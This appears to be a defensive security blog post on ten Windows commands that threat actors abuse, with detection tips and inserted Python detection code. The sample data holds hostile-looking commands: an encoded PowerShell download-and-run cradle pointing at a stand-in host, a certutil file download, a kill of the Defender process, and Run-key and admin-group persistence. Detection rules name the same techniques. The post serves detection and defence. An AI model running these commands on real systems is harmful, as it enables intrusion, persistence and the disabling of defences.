By Trent W
In this blog, we’ll explore a range of common Windows commands and how they are often used by threat actors to gain control, escalate privileges, maintain persistence, or move laterally across a network. We’ll also provide guidance on how security analysts can investigate these behaviors.
1. PowerShell (IEX – Invoke-Expression): Download Scripts in Memory
What It Is:
PowerShell is a powerful scripting language built into Windows that allows users to automate tasks and manage configurations. The IEX (Invoke-Expression) command executes a string of PowerShell code directly from memory.
How Attackers Use It:
Threat actors often use PowerShell to execute malicious scripts in memory, which can help avoid detection by traditional file-based antivirus solutions. By using IEX to download and run scripts, attackers can avoid writing files to disk, reducing the likelihood of triggering file-based signature detection.
Defensive Tip:
Security analysts should monitor PowerShell activity, especially the use of IEX and similar in-memory execution techniques. One key indicator of suspicious activity is PowerShell scripts that are executed with obfuscated or encoded payloads.
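As an added example (not code from the original post), the following Python decodes the -EncodedCommand argument that obfuscated PowerShell launches carry and checks both the command line and the decoded script for the in-memory execution indicators this section describes. The sample command lines and the indicator list are constructed assumptions, not telemetry from any real system.

```python
import base64
import re
from typing import Optional

# PowerShell accepts abbreviated forms of -EncodedCommand; the payload is base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Assumption: a starting set of in-memory execution indicators, matched against the lowercased
# command line (with the base64 blob removed) plus the decoded script. Extend from your own telemetry.
INDICATORS = {
    "invoke-expression": r"\biex\b|invoke-expression",
    "download-cradle": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod",
    "base64-in-script": r"frombase64string",
}

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None when the flag is absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_powershell(cmdline: str) -> dict:
    """Decode any encoded payload and report which in-memory execution indicators are present."""
    decoded = decode_encoded_command(cmdline)
    text = (ENC_FLAG.sub("", cmdline) + " " + (decoded or "")).lower()
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, text)]
    if decoded is not None:
        hits.append("encoded-command")
    return {"decoded": decoded, "indicators": hits, "suspicious": bool(hits)}

def encode_for_test(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (only for constructed samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines (not real telemetry): one encoded download-and-run, one routine script.
SAMPLES = [
    "powershell.exe -NoP -EncodedCommand " + encode_for_test(
        "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s.ps1')"),
    "powershell.exe -File C:\\Scripts\\nightly-backup.ps1",
]
```

Run analyze_powershell over each entry of SAMPLES: the first decodes to the plain script and reports three indicators, the second reports none.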
2. Net User and Net Local Group: Modify Privileges
What It Is:
The net user and net localgroup commands allow users to manage user accounts and local group memberships on a Windows machine. These commands can be used to add, modify, or remove users from system groups.
How Attackers Use It:
Attackers often use these commands to escalate privileges by adding themselves to high-privilege groups like “Administrators” or “Domain Admins.” This is a common step in lateral movement and post-exploitation activities, allowing attackers to gain more control over a compromised system.
Defensive Tip:
Monitor for unusual changes to user accounts, particularly adding users to privileged groups. Consider setting up alerts for the use of net user and net localgroup to detect privilege escalation attempts.
3. schtasks: Establish Persistence
What It Is:
schtasks is a command-line utility that allows users to schedule tasks to run at specified times. It’s often used for automating system maintenance or running scripts.
How Attackers Use It:
Malicious actors often use schtasks to create scheduled tasks that persist even after the system is rebooted. These tasks can be set to run malware or scripts at specified intervals, helping attackers maintain long-term access to the compromised system.
Defensive Tip:
Security teams should regularly audit scheduled tasks for unusual activity. Look for tasks with unfamiliar names or commands, and investigate any tasks running with elevated privileges that don’t seem to belong to legitimate system processes.
4. reg add: Establish Persistence and Disable AV
What It Is:
The reg add command allows users to modify the Windows registry, adding or changing keys and values.
How Attackers Use It:
Attackers commonly use reg add to add registry keys that enable persistence, such as entries under the “Run” or “RunOnce” registry paths, which launch malware upon system startup. Attackers can also use it to disable antivirus or security software by modifying relevant registry entries.
Defensive Tip:
Regularly audit the registry for suspicious entries, especially under paths like HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. Additionally, monitor for modifications to security-related registry keys that may disable or interfere with antivirus tools.
5. wmic: Lateral Movement and Recon
What It Is:
The Windows Management Instrumentation Command-line (WMIC) tool allows for system management and automation tasks, including querying system information, managing processes, and interacting with remote systems.
How Attackers Use It:
WMIC is often used by attackers for lateral movement within a network. By executing commands on remote systems, they can gather information about the network, such as user accounts, running processes, and network shares. It can also be used to execute commands on remote machines, making it a powerful tool for spreading malware.
Defensive Tip:
Monitor for unusual WMIC activity, such as commands that query remote systems or perform suspicious actions on systems that don’t match the typical usage patterns. WMIC-based lateral movement can often be detected by monitoring for unusual inbound or outbound network traffic related to WMI.
6. rundll32: Fileless Malware Hidden in DLL Files
What It Is:
rundll32 is a Windows utility that allows users to execute functions stored in dynamic link libraries (DLLs) without launching an executable file.
How Attackers Use It:
Attackers can use rundll32 to load and execute malicious code embedded in DLL files, a technique often used in fileless malware attacks. By executing code directly from memory, attackers can avoid detection by file-based antivirus programs.
Defensive Tip:
Monitor the use of rundll32, especially when it’s invoking DLLs from unusual or unexpected locations. This may indicate an attempt to run fileless malware or exploit a DLL hijacking vulnerability.
7. netstat: Shows Network Connections
What It Is:
netstat is a network utility that provides information about network connections, routing tables, and network interfaces.
How Attackers Use It:
Attackers can use netstat to gather information about active network connections and identify potential communication channels between compromised systems and command-and-control (C2) servers. This information helps attackers evade detection and persist in the network.
Defensive Tip:
Regularly review netstat output for unusual or unauthorized outbound connections, especially to known malicious IP addresses or countries. Pay attention to connections that may be indicative of C2 communication.
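An added example, not part of the original post: a small Python parser for netstat -ano output that flags established TCP sessions to external hosts not on an allowlist, keyed by the owning PID so the process can be pulled with tasklist. The sample output, the internal address ranges and the allowlist are constructed assumptions.

```python
import ipaddress

# Constructed `netstat -ano` output (not real data); TEST-NET and documentation ranges stand in for the internet.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       916
  TCP    10.0.0.5:49712         10.0.0.20:445          ESTABLISHED     4
  TCP    10.0.0.5:49810         203.0.113.10:443       ESTABLISHED     4120
  TCP    10.0.0.5:49811         198.51.100.7:8443      ESTABLISHED     5588
  TCP    [fe80::1%12]:49813     [2001:db8::10]:443     ESTABLISHED     5588
  UDP    0.0.0.0:5353           *:*                                    1320
"""

# Assumptions: the organisation's internal ranges, and remote hosts it expects to reach (e.g. update servers).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "::1/128", "fe80::/10", "fc00::/7")]
ALLOWED_REMOTES = {"203.0.113.10"}

def split_endpoint(endpoint):
    """'[2001:db8::10]:443' -> ('2001:db8::10', 443); '*:*' -> ('*', None)."""
    host, _, port = endpoint.rpartition(":")
    host = host.strip("[]").split("%")[0]          # drop IPv6 brackets and zone index
    return host, (int(port) if port.isdigit() else None)

def parse_netstat(text):
    """Turn netstat -ano lines into dicts; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP":
            proto, local, remote, state, pid = parts
        elif len(parts) == 4 and parts[0] == "UDP":   # UDP rows carry no state column
            (proto, local, remote, pid), state = parts, ""
        else:
            continue
        rows.append({"proto": proto, "local": local, "remote": remote, "state": state, "pid": int(pid)})
    return rows

def is_external(host):
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:                              # '*' or a hostname
        return False
    return not any(ip in net for net in INTERNAL_NETS)

def suspicious_connections(text, allowed=ALLOWED_REMOTES):
    """Established TCP sessions to external hosts that are not on the allowlist, with the owning PID."""
    flagged = []
    for row in parse_netstat(text):
        host, port = split_endpoint(row["remote"])
        if row["state"] == "ESTABLISHED" and is_external(host) and host not in allowed:
            flagged.append({"pid": row["pid"], "remote": host, "port": port})
    return flagged
```

On the constructed sample, suspicious_connections(SAMPLE_NETSTAT) returns the two sessions owned by PID 5588; the SMB session to 10.0.0.20 and the allowlisted 203.0.113.10 are left alone.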
8. tasklist and taskkill: See and Kill Processes
What It Is:
The tasklist command shows a list of currently running processes, while taskkill allows users to terminate running processes.
How Attackers Use It:
Malicious actors use tasklist to identify processes running on the system, including security software or forensic tools. If they detect a process they want to avoid or terminate, they can use taskkill to stop it, hindering detection efforts or disrupting defensive measures.
Defensive Tip:
Look for unusual activity around tasklist and taskkill. Monitor for processes being terminated that are related to security tools, and investigate when privileged users execute these commands.
9. whoami: Admin Rights and Low-Privilege Accounts
What It Is:
The whoami command simply returns the username of the current user, along with group memberships.
How Attackers Use It:
Attackers use whoami to confirm their privileges on a compromised system. If they’re operating with low-level privileges, they can use this command to verify their user status and plan privilege escalation.
Defensive Tip:
Monitor the use of whoami by non-administrative users, as it may indicate an attacker trying to assess their access level before attempting to escalate privileges.
10. certutil: Transfer Files or Man-in-the-Middle Attacks
What It Is:
certutil is a command-line tool for managing certificates on Windows systems. It’s often used for creating, importing, or exporting certificates.
How Attackers Use It:
While primarily intended for managing certificates, certutil is frequently abused by attackers to download files from remote servers, bypassing traditional file transfer methods. In some cases, it’s used in Man-in-the-Middle (MitM) attacks to manipulate certificate stores or tamper with secure communications.
Defensive Tip:
Monitor the use of certutil for unexpected file transfers or modifications to certificates, particularly when it’s used to download or execute payloads. Pay close attention to outbound traffic patterns that may indicate exfiltration attempts.
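The monitoring tips in sections 2 through 6, 8 and 10 all come down to matching process-creation command lines, so here is one added example (my code, not the author's) that runs a small rule set over constructed 4688/Sysmon-style events. The events, the rule patterns and the list of protected security processes are assumptions to tune to your own estate.

```python
import re

# Constructed process-creation events in the shape of Security 4688 / Sysmon Event 1 (not real telemetry).
EVENTS = [
    {"id": 1, "user": "CORP\\jdoe", "cmdline": "net localgroup Administrators jdoe /add"},
    {"id": 2, "user": "CORP\\jdoe", "cmdline": "schtasks /create /sc onlogon /tn Updater /tr C:\\Users\\jdoe\\AppData\\Local\\u.exe"},
    {"id": 3, "user": "CORP\\jdoe", "cmdline": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /d C:\\Users\\jdoe\\AppData\\Local\\u.exe"},
    {"id": 4, "user": "CORP\\jdoe", "cmdline": "wmic /node:WS-0042 process list brief"},
    {"id": 5, "user": "CORP\\jdoe", "cmdline": "rundll32.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\x.dll,Start"},
    {"id": 6, "user": "CORP\\jdoe", "cmdline": "taskkill /F /IM MsMpEng.exe"},
    {"id": 7, "user": "CORP\\jdoe", "cmdline": "certutil -urlcache -f https://example.invalid/a.bin a.bin"},
    {"id": 8, "user": "CORP\\helpdesk", "cmdline": "net user jdoe /domain"},  # routine lookup, must not fire
]

# Assumption: these patterns cover the command shapes this page describes; applied to the lowercased command line.
RULES = {
    "net: addition to privileged group": r"\bnet1?(?:\.exe)?\s+(?:local)?group\s+\"?(?:administrators|domain admins)\"?\s.*/add\b",
    "net: local account created": r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b",
    "schtasks: task runs as SYSTEM or from user-writable path": r"\bschtasks(?:\.exe)?\s+/create\b.*(?:/ru\s+\"?(?:system|nt authority\\system)|/tr\s+\"?[a-z]:\\(?:users|programdata)\\)",
    "reg: Run/RunOnce persistence": r"\breg(?:\.exe)?\s+add\s+.*\\currentversion\\run(?:once)?\b",
    "reg: Windows Defender policy modified": r"\breg(?:\.exe)?\s+add\s+.*\\windows defender\b",
    "wmic: command aimed at a remote node": r"\bwmic(?:\.exe)?\b.*/node:",
    "certutil: URL or decode argument": r"\bcertutil(?:\.exe)?\b.*(?:https?://|-decode\b)",
}
PROTECTED_PROCESSES = {"msmpeng.exe", "sysmon.exe", "sysmon64.exe"}   # assumed security tooling to protect
USER_WRITABLE = re.compile(r"[a-z]:\\(?:users\\|programdata\\|windows\\temp\\)")

def is_cmd(text, name):
    """True when the command line invokes `name` (with or without .exe, with or without a leading path)."""
    return re.search(rf"\b{name}(?:\.exe)?\b", text) is not None

def match_rules(cmdline):
    """Return the names of every rule a single command line triggers."""
    text = cmdline.lower()
    hits = [name for name, pat in RULES.items() if re.search(pat, text)]
    if is_cmd(text, "taskkill") and any(p in text for p in PROTECTED_PROCESSES):
        hits.append("taskkill: security tool targeted")
    if is_cmd(text, "rundll32") and USER_WRITABLE.search(text):
        hits.append("rundll32: DLL loaded from user-writable path")
    return hits

def triage(events):
    """Map event id -> matched rule names for every event that triggered at least one rule."""
    findings = {}
    for event in events:
        hits = match_rules(event["cmdline"])
        if hits:
            findings[event["id"]] = hits
    return findings
```

triage(EVENTS) flags events 1 through 7 with one rule each and leaves the helpdesk lookup in event 8 alone; in production the event's user and parent process belong in the verdict as well.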
Conclusion
Many of the commands listed above are legitimate and powerful tools within the Windows environment, but they can also be exploited by threat actors to carry out malicious activities. By understanding how these commands can be abused, defensive security analysts can develop better detection and response strategies to identify and mitigate attacks early. Regular monitoring, auditing, and analysis of system activity, along with using advanced threat detection tools, are critical in defending against these types of attacks.